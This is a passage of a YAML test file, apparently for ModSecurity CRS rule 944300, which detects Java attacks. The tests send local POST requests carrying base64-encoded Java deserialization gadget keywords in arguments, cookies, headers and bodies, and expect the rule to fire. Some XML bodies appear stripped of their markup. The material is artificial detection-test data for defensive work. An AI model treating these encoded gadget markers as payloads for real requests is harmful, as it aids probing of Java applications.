stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"GZvcmNsb3N1cmU\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-120 + desc: "Content-Type application/json arg name includes keyword GZvcmNsb3N1cmU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"GZvcmNsb3N1cmU\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-121 + desc: "Argument test includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-122 + desc: "Argument name includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-123 + desc: "Cookie test includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bmb3JjbG9zdXJl + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-124 + desc: "Cookie name includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bmb3JjbG9zdXJl=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-125 + desc: "Request header test includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bmb3JjbG9zdXJl + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-126 + desc: "XML attribute value includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-127 + desc: "XML element value includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-128 + desc: "Nested XML element value includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-129 + desc: "Content-Type text/plain includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Bmb3JjbG9zdXJl" + output: + log_contains: "id \"944300\"" + - test_title: 944300-130 + desc: "Content-Type application/json arg value includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Bmb3JjbG9zdXJl\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-131 + desc: "Content-Type application/json arg name includes keyword Bmb3JjbG9zdXJl" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Bmb3JjbG9zdXJl\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-132 + desc: "Argument test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-133 + desc: "Argument name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-134 + desc: "Cookie test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=aW5zdGFudGlhdGVmYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-135 + desc: "Cookie name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: aW5zdGFudGlhdGVmYWN0b3J5=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-136 + desc: "Request header test includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: aW5zdGFudGlhdGVmYWN0b3J5 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-137 + desc: "XML attribute value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-138 + desc: "XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-139 + desc: "Nested XML element value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-140 + desc: "Content-Type text/plain includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=aW5zdGFudGlhdGVmYWN0b3J5" + output: + log_contains: "id \"944300\"" + - test_title: 944300-141 + desc: "Content-Type application/json arg value includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"aW5zdGFudGlhdGVmYWN0b3J5\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-142 + desc: "Content-Type application/json arg name includes keyword aW5zdGFudGlhdGVmYWN0b3J5" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"aW5zdGFudGlhdGVmYWN0b3J5\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-143 + desc: "Argument test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-144 + desc: "Argument name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-145 + desc: "Cookie test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Gluc3RhbnRpYXRlZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-146 + desc: "Cookie name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Gluc3RhbnRpYXRlZmFjdG9yeQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-147 + desc: "Request header test includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Gluc3RhbnRpYXRlZmFjdG9yeQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-148 + desc: "XML attribute value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-149 + desc: "XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-150 + desc: "Nested XML element value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-151 + desc: "Content-Type text/plain includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Gluc3RhbnRpYXRlZmFjdG9yeQ" + output: + log_contains: "id \"944300\"" + - test_title: 944300-152 + desc: "Content-Type application/json arg value includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Gluc3RhbnRpYXRlZmFjdG9yeQ\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-153 + desc: "Content-Type application/json arg name includes keyword Gluc3RhbnRpYXRlZmFjdG9yeQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Gluc3RhbnRpYXRlZmFjdG9yeQ\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-154 + desc: "Argument test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-155 + desc: "Argument name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-156 + desc: "Cookie test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=BpbnN0YW50aWF0ZWZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-157 + desc: "Cookie name includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: BpbnN0YW50aWF0ZWZhY3Rvcnk=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-158 + desc: "Request header test includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BpbnN0YW50aWF0ZWZhY3Rvcnk + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-159 + desc: "XML attribute value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-160 + desc: "XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-161 + desc: "Nested XML element value includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BpbnN0YW50aWF0ZWZhY3Rvcnk" + output: + log_contains: "id \"944300\"" + - test_title: 944300-162 + desc: "Content-Type text/plain includes keyword BpbnN0YW50aWF0ZWZhY3Rvcnk" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 